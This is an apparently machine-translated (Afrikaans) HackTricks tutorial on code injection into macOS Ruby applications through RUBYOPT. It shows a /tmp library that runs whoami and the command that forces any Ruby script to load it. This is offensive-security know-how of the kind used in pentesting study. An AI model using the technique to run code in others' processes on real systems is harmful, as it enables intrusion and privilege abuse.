HackTricksmacOS Ruby Applications Injection
Reading time: 2 minutes
tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
RUBYOPT
Deur hierdie omgewing veranderlike te gebruik, is dit moontlik om nuwe parameters by ruby te voeg wanneer dit uitgevoer word. Alhoewel die parameter -e nie gebruik kan word om ruby kode aan te dui om uit te voer nie, is dit moontlik om die parameters -I en -r te gebruik om 'n nuwe gids by die biblioteke laai pad te voeg en dan 'n biblioteek aan te dui om te laai.
Skep die biblioteek inject.rb in /tmp:
puts `whoami`
Skep enige plek 'n ruby-skrip soos:
puts 'Hello, World!'
Dan maak 'n arbitrêre ruby-skrip dit laai met:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Interessante feit, dit werk selfs met die param --disable-rubyopt:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.